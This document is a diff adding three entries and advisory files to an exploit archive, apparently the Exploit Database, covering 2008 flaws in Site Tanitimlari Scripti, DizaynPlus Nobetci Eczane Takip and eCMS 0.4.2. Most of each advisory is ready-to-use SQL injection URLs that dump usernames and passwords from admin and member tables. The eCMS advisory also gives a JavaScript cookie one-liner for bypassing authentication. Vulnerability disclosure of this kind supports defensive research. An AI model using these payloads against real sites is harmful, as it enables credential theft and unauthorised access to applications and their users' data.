Updated 02_23_2014

files.csv

@@ -28598,3 +28598,6 @@ id,file,description,date,author,platform,type,port
 31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
 31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
 31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0
+31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0
+31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0
+31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0

platforms/asp/webapps/31811.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29299/info
+
+Site Tanitimlari Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
+http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,PAROLA,3+from+KULLANICI
+http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,PAROLA,3+from+KULLANICI
+http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
+http://www.example.com/lab/site/yonetim_kategori_duzenle.asp?ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
+http://www.example.com/lab/site/yonetim_kategori_duzenle.asp?islem=duzenle&ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
+http://www.example.com/lab/site/yonetim_site_onayla.asp?ID=1+union+select+0,1,KULLANICIADI,3,4,PAROLA,6,7,8,9,1,1+from+KULLANICI
+

platforms/asp/webapps/31812.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29300/info
+
+DizaynPlus Nobetci Eczane Takip is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DizaynPlus Nobetci Eczane Takip 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/lab/nobetcideczane/ayrinti.asp?anahtar=1+union+select+0,1,2,(admin),sifre,5+from+yetkili 

platforms/php/webapps/31813.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/29304/info
+
+eCMS is prone to multiple security vulnerabilities, including a security-bypass issue and an SQL-injection issue.
+
+Exploiting these issues may allow an attacker to bypass certain security restrictions and gain unauthorized access to the application. The attacker can also exploit the SQL-injection issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. This will compromise the application and may aid in further attacks.
+
+These issues affect eCMS 0.4.2; other versions may also be affected. 
+
+http://www.example.com/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
+http://www.example.com/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
+
+The following proof-of-concept JavaScript code to create a cookie is available for the security-bypass issue:
+
+javascript:document.cookie = "pass=1; path=/";
+